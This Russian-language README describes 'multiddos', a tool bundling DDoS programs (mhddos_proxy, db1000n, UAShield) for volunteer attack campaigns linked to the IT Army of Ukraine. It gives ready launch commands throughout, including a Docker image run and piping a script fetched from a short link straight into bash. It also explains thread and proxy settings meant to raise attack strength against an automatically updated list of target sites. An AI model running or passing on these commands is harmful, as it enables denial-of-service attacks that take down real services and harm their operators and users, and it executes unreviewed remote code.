- Объединяет в себе несколько утилит для ддоса, и для мониторинга (gotop, vnstat)
- Полностью автоматизирован. Автоматическое обновление программ, автоматическая настройка, автоматическая смена целей.
- Запуск одной простой командой.
- При закрытии терминала или разрыве ssh сессии программы не вылетают, а продолжают работать в фоне. В любой момент multiddos можно снова вывести на экран.
- Автоматически подбирает количество потоков (threads) для работы, в зависимости от количества доступных логических ядер.
- Имеет базу на сотни (иногда тысячи) сайтов/адресов.
- Multiddos, ранее известный как auto_mhddos (обвертка для mhddos_proxy) от Украинского Жнеца (канал, чат)
db1000n от IT ARMY of Ukraine (канал, чат)временно отключеноUA Cyber SHIELD (канал, чат)временно отключено
развернуть
Мы хотели собрать утилиты, которые:
- Можно полностью автоматизировать
- Имеют хорошую эффективность и поддерживаются разработчиками
- Умеют работать через прокси
Полностью данным требованиям соответствует только mhddos_proxy. DB1000N не умеет работать через прокси. UAShield прожорливая и низкоэффективная по сравнению с mhddos_proxy. Поэтому на данном этапе по умолчанию используется только mhddos_proxy.
-
Скачать и установить Docker
-
Запустить multiddos в docker:
docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd
-
Альтернативный запуск для слабых систем. Будет использоваться только 1 ядро на 90% (использовать если процессор забивается на 100% и система тормозит).
docker run --cpus 0.9 -it --rm --log-driver none --name multidd --pull always karboduck/multidd -
Если вам нужно запустить несколько копий multiddos.
Используйте разные имена (--name multidd1, --name multidd2 и т.д.), либо не используйте имена вообще -
Запуск docker c ключами.
Docker версия поддерживает те же ключи, что и bash версия. Прописывайте их точно так же в конце команды.docker run -it --rm --log-driver none --name multidd --pull always karboduck/multidd -t 500 +v
Подробнее про ключи читайте ниже в разделе Опции запуска.
- Нажать в окне несколько раз подряд
Ctrl + C
- В другом терминале запустить команду
docker stop multidd
- Перезагрузить операционную систему
docker attach multidd
curl -L tiny.one/multiddos | bash && tmux a
развернуть
То же самое что и обычный запуск, но программы не будут выводиться из фона. Соответственно просто удаляем вызов Tmux в конце команды.
curl -L tiny.one/multiddos | bash
Чтобы обратно подключиться к сессии tmux (вывести программы на экран) прочитайте раздел Управление Tmux.
- Нажать в окне несколько раз подряд
Ctrl + C
- В другом терминале запустить команду
pkill tmux; pkill node; pkill shield; pkill -f start.py; pkill -f runner.py
- Перезагрузить операционную систему
tmux a
развернуть
-
Свернуть Tmux. Программы продолжат работать в фоне, и к сессии можно будет позже снова подключиться.
Нажмите Ctrl+b
отпуститеНажмите d
-
Закрыть сессию Tmux. Сначала выйдите из Tmux:
Нажмите Ctrl+b
отпуститеНажмите d
. Выполните в терминале командуtmux kill-session -t multiddos
-
Переподключиться к сессии Tmux. Если у вас всего одна сессия Tmux, то используйте:
tmux a
(tmux attach). Если у вас несколько сессий, подключайтесь по имени:tmux attach-session -t multiddos
развернуть
Multiddos запускается по умолчанию с gotop и multiddos. Это стандартная конфигурация. Из этой конфигурации можно убрать gotop. Или добавить в нее утилиты: db1000n, uashield, vnstat, matrix.
Для того, чтобы убрать утилиту используется ключ со знаком "-":
-g
убрать gotop
Для того, чтобы добавить утилиту используется ключ со знаком "+":
+d
убрать db1000n
+u
добавить uashield
+v
добавить vnstat -l (мониторинг трафика)
-p0
или --no-proxy-finder
отключить proxy finder
-p 2000
или --proxy-threads 2000
задать количество потоков для proxy finder. Чем выше значение, тем быстрее происходит сканирование и поиск новых прокси, но тем и выше нагрузка на CPU и сеть. Поэтому при больших значениях может падать скорость атак.
-t 500
или --threads 500
задать количество потоков для mhddos_proxy
--no-uvloop
отключает модуль uvloop. Модуль uvloop повышает производительность работы с сетью, но на некоторых системах результат получается обратным, поэтому добавлен ключ для его отключения.
Пример команды (убрать gotop и включить 2000 потоков для proxy finder):
curl -LO tiny.one/multiddos && bash multiddos -g -p 2000 && tmux a
развернуть
Основная проблема - перебои в работе сетевого адаптера. Особенно часто проявляется при запуске скрипта на виртуальной машине. Ддос пакеты влияют не только на удаленные сервера, но и на локальное железо.
Внешние проявления могут самыми разнообразными, нелогичными и на первый взгляд не связанными с сетью. Но, если скрипт не запускается, просто перезапустите систему и попробуйте снова. Едва ли не в 80% случаев это решает проблемы.
Вылетает db1000n или uashield.
Это либо опять побочка проблем с сетью, смотрите пункт выше. Либо сбой самих программ, с чем мы ничего поделать не можем. Хорошая новость заключается в том, что 95% полезной работы выполняет mhddos_proxy. Пока он не вылетает, все идет по плану.
Низкий трафик. В подавляющем большинстве случаев это значит, что атакуемые сайты либо уже лежат, либо их закрыли гео-блоком (отгородили от внешнего мира). Это нормально, наши атаки все равно приносят пользу, продолжаем работать.